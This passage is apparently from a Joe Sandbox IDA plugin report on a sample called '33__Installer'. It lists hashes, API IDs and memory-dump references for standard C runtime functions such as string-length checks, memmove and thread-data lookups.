                  • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                  • String ID:
                  • API String ID: 3058430110-0
                  • Opcode ID: f4f05524ab8f3411c0ddc7a51d4b8e5dda58374d60ba6452786d4b85754ec908
                  • Instruction ID: 364a20f75b01daf2ff873118b95c1087dc288cb4030d15e33f1f93f78fa75fc3
                  • Opcode Fuzzy Hash: f4f05524ab8f3411c0ddc7a51d4b8e5dda58374d60ba6452786d4b85754ec908
                  • Instruction Fuzzy Hash: 7631AE31A20695EFDF28DF64CC81ABD3BB5EF11350F1485A9E4619B191D730EE80DB90
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.4104908533.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                  • Associated: 00000000.00000002.4104888879.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.4104929579.0000000000C39000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.4104944072.0000000000C3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.4104958779.0000000000C42000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_c20000_33__Installer.jbxd
                  Similarity
                  • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                  • String ID:
                  • API String ID: 3016257755-0
                  • Opcode ID: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                  • Instruction ID: 3330ca1177ecf381c9b61cd53052eeeb83ce566aea6ed0c581734a04447d8aa1
                  • Opcode Fuzzy Hash: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                  • Instruction Fuzzy Hash: F9114B3641015EBBCF22AE95EC01CEE3F62FF59350F588455FE2859831D236CAB1AB81
                  APIs
                  • std::_Xinvalid_argument.LIBCPMT ref: 00C22A3B
                    • Part of subcall function 00C24361: std::exception::exception.LIBCMT ref: 00C24376
                    • Part of subcall function 00C24361: __CxxThrowException@8.LIBCMT ref: 00C2438B
                  • std::_Xinvalid_argument.LIBCPMT ref: 00C22A52
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.4104908533.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                  • Associated: 00000000.00000002.4104888879.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.4104929579.0000000000C39000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.4104944072.0000000000C3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.4104958779.0000000000C42000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_c20000_33__Installer.jbxd
                  Similarity
                  • API ID: Xinvalid_argumentstd::_$Exception@8Throwstd::exception::exception
                  • String ID: string too long
                  • API String ID: 3336028256-2556327735
                  • Opcode ID: 94510e11bc940ec69a4a7cc64b6d7fb5a156894c77e1045880e8739ab0d11636
                  • Instruction ID: d366cff6ed1c7d9f5a5b00ddff4f931df707022a33dcab55d644ebb3569e1915
                  • Opcode Fuzzy Hash: 94510e11bc940ec69a4a7cc64b6d7fb5a156894c77e1045880e8739ab0d11636
                  • Instruction Fuzzy Hash: 7D11E933300620ABD731E95CB880A6AF7E9EFA5760F10062FF592C7E91C7B19D0093A5
                  APIs
                  • std::_Xinvalid_argument.LIBCPMT ref: 00C22724
                    • Part of subcall function 00C24361: std::exception::exception.LIBCMT ref: 00C24376
                    • Part of subcall function 00C24361: __CxxThrowException@8.LIBCMT ref: 00C2438B
                  • _memmove.LIBCMT ref: 00C2276B
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.4104908533.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                  • Associated: 00000000.00000002.4104888879.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.4104929579.0000000000C39000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.4104944072.0000000000C3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.4104958779.0000000000C42000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_c20000_33__Installer.jbxd
                  Similarity
                  • API ID: Exception@8ThrowXinvalid_argument_memmovestd::_std::exception::exception
                  • String ID: string too long
                  • API String ID: 22950630-2556327735
                  • Opcode ID: 17f0c633f45903d27d873b7ae0a853b5fc0d7478250032e1ae3e2368b4ff5ac7
                  • Instruction ID: 3511bf12c40fb8d90788ae37615d8b5abc293018b09a776ec3dfedf6e83931c1
                  • Opcode Fuzzy Hash: 17f0c633f45903d27d873b7ae0a853b5fc0d7478250032e1ae3e2368b4ff5ac7
                  • Instruction Fuzzy Hash: E2110B311183306FEB24DD78F8C0A2EB7A8EF51B24F240A2EE497C3982DB71A5448351
                  APIs
                  • std::_Xinvalid_argument.LIBCPMT ref: 00C2411C
                    • Part of subcall function 00C243AE: std::exception::exception.LIBCMT ref: 00C243C3
                    • Part of subcall function 00C243AE: __CxxThrowException@8.LIBCMT ref: 00C243D8
                    • Part of subcall function 00C22710: std::_Xinvalid_argument.LIBCPMT ref: 00C22724
                  • _memmove.LIBCMT ref: 00C24177
                  Strings
                  • invalid string position, xrefs: 00C24117
                  Memory Dump Source
                  • Source File: 00000000.00000002.4104908533.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                  • Associated: 00000000.00000002.4104888879.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.4104929579.0000000000C39000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.4104944072.0000000000C3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.4104958779.0000000000C42000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_c20000_33__Installer.jbxd
                  Similarity
                  • API ID: Xinvalid_argumentstd::_$Exception@8Throw_memmovestd::exception::exception
                  • String ID: invalid string position
                  • API String ID: 1253240057-1799206989
                  • Opcode ID: f08865c9a6bd955b2e1b2da56805b801dc0308fe0db40decdb04e74bd6ddb32b
                  • Instruction ID: f4da84bd2f5f77ce73651687712883cff9ecffd61cb39adf834ea926c0244bc4
                  • Opcode Fuzzy Hash: f08865c9a6bd955b2e1b2da56805b801dc0308fe0db40decdb04e74bd6ddb32b
                  • Instruction Fuzzy Hash: DF11EB31304230A7CB2CDE08FC41A5EB3A5EBA5710F10091DF912CBA81DBB0DD918795
                  APIs
                  • std::_Xinvalid_argument.LIBCPMT ref: 00C22636
                    • Part of subcall function 00C243AE: std::exception::exception.LIBCMT ref: 00C243C3
                    • Part of subcall function 00C243AE: __CxxThrowException@8.LIBCMT ref: 00C243D8
                  • _memmove.LIBCMT ref: 00C2266F
                  Strings
                  • invalid string position, xrefs: 00C22631
                  Memory Dump Source
                  • Source File: 00000000.00000002.4104908533.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                  • Associated: 00000000.00000002.4104888879.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.4104929579.0000000000C39000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.4104944072.0000000000C3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.4104958779.0000000000C42000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_c20000_33__Installer.jbxd
                  Similarity
                  • API ID: Exception@8ThrowXinvalid_argument_memmovestd::_std::exception::exception
                  • String ID: invalid string position
                  • API String ID: 22950630-1799206989
                  • Opcode ID: b370a9f6c8cd909fae1f32169a11411e320971d79253f9a7de93debbd297b01d
                  • Instruction ID: d4874c9a844642f8ffd2561865aa9f9899f824bbaea3017f8aa050e8fa770369
                  • Opcode Fuzzy Hash: b370a9f6c8cd909fae1f32169a11411e320971d79253f9a7de93debbd297b01d
                  • Instruction Fuzzy Hash: E4019633300220ABD725DD6CFC8096AB7EAEB95750B24492DF195CBF45D6B1EC4293A4
                  APIs
                    • Part of subcall function 00C252BF: __getptd.LIBCMT ref: 00C252C5
                    • Part of subcall function 00C252BF: __getptd.LIBCMT ref: 00C252D5
                  • __getptd.LIBCMT ref: 00C284D8
                    • Part of subcall function 00C29DF0: __getptd_noexit.LIBCMT ref: 00C29DF3
                    • Part of subcall function 00C29DF0: __amsg_exit.LIBCMT ref: 00C29E00
                  • __getptd.LIBCMT ref: 00C284E6
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.4104908533.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                  • Associated: 00000000.00000002.4104888879.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.4104929579.0000000000C39000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.4104944072.0000000000C3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.4104958779.0000000000C42000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_c20000_33__Installer.jbxd
                  Similarity
                  • API ID: __getptd$__amsg_exit__getptd_noexit
                  • String ID: csm
                  • API String ID: 803148776-1018135373
                  • Opcode ID: 7ac9b9e78d102514e922c48253c2e6458c63c24901c13d7d1d05d3f499542958
                  • Instruction ID: 0fe625f3e6a16ca110b498b353278c46132d567fddec8e3f5f985500368639f5
                  • Opcode Fuzzy Hash: 7ac9b9e78d102514e922c48253c2e6458c63c24901c13d7d1d05d3f499542958
                  • Instruction Fuzzy Hash: 76014B75802229CBEF359F24F4406ADB3F5BF20311F64442DF4A156EA1CF308A98EB51